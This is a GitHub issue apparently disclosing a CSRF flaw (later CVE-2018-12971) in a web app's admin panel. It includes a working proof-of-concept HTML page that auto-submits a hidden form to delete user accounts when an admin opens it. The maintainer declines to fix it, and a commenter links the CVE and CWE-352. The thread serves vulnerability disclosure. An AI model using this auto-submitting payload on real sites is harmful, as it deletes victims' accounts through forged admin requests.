Skip to content
This repository has been archived by the owner on Dec 26, 2019. It is now read-only.

There is a CSRF vulnerability which can delete user account #3

Closed
chenrui1896 opened this issue Jun 28, 2018 · 2 comments
Closed

There is a CSRF vulnerability which can delete user account #3

chenrui1896 opened this issue Jun 28, 2018 · 2 comments

Comments

@chenrui1896
Copy link

chenrui1896 commented Jun 28, 2018

In this case, the POC is "a.html".After admin login,when he open "a.html",he will delete user. Let's see it.

First I add 3 user accounts as ID 6,7,8

image

We can delete these accounts by submiting this html form.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:82/easy/index.php?s=/admin/user/delAll" method="POST">
      <input type="hidden" name="ids&#91;&#93;" value="8" />
      <input type="hidden" name="ids&#91;&#93;" value="7" />
      <input type="hidden" name="ids&#91;&#93;" value="6" />
      <input type="submit" value="Submit request" />
    </form>
       <script> document.forms[0].submit(); </script>
  </body>
</html>

image

Then the user accounts had been deleted!!!
image

@jaychenthinkfast
Copy link
Collaborator

no protection in the management background,we are not going to deal with it

@fgeek
Copy link

fgeek commented Jul 8, 2018

https://nvd.nist.gov/vuln/detail/CVE-2018-12971

@chenjiesuper You should fix this. Please read: https://cwe.mitre.org/data/definitions/352.html other references also widely available.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants